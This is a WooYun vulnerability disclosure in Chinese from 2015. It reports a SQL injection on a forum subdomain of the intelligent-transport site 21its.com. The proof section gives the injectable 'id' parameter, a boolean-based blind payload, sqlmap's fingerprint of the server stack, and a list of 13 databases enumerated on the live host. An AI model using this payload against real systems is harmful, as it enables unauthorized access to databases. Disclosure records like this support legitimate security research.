漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-097971
漏洞标题:智能交通网某站存在sql注入漏洞
相关厂商:智能交通网
漏洞作者: 路人甲
提交时间:2015-02-25 10:20
修复时间:2015-04-13 16:58
公开时间:2015-04-13 16:58
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
智能交通网(21its)是中国智能交通领域权威资讯媒体,成立于2006年7月7日,是国内较早致力于ITS发展的专业公司之一,智能交通网隶属于艾迪艾思(北京)科技有限公司旗下。
艾迪艾思(北京)科技有限公司,成立于2006年7月,注册资金5000万,是国内较早致力于ITS发展的国家高新技术企业。公司主要专注于智能交通(ITS)及相关硬件和软件的研发与销售,并具有安防系统的设计与施工能力,面向高速公路、城市交通、公共交通、安防系统等领域,为用户提供完整的综合交通运输行业智能化系统和安防系统的解决方案和信息服务。
详细说明:
漏洞证明:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2013112615424300001' AND 5816=5816 AND 'cKam'='cKam
---
[12:57:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[12:57:17] [INFO] fetching database names
[12:57:17] [INFO] fetching number of databases
[12:57:17] [INFO] resumed: 13
[12:57:17] [INFO] resumed: dhba5
[12:57:17] [INFO] resumed: EngTraffic
[12:57:17] [INFO] resumed: ItsAlas
[12:57:17] [INFO] resumed: ItsForum
[12:57:17] [INFO] resumed: master
[12:57:17] [INFO] resumed: model
[12:57:17] [INFO] resumed: msdb
[12:57:17] [INFO] resumed: ReportServer
[12:57:17] [INFO] resumed: ReportServerTempDB
[12:57:17] [INFO] resumed: tempdb
[12:57:17] [INFO] resumed: Traffic2.0
[12:57:17] [INFO] resumed: TrafficPro
[12:57:17] [INFO] resumed: UserPointLog
available databases [13]:
[*] [Traffic2.0]
[*] dhba5
[*] EngTraffic
[*] ItsAlas
[*] ItsForum
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] TrafficPro
[*] UserPointLog
[12:57:17] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/bbs.21its.com'
[*] shutting down at 12:57:17
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝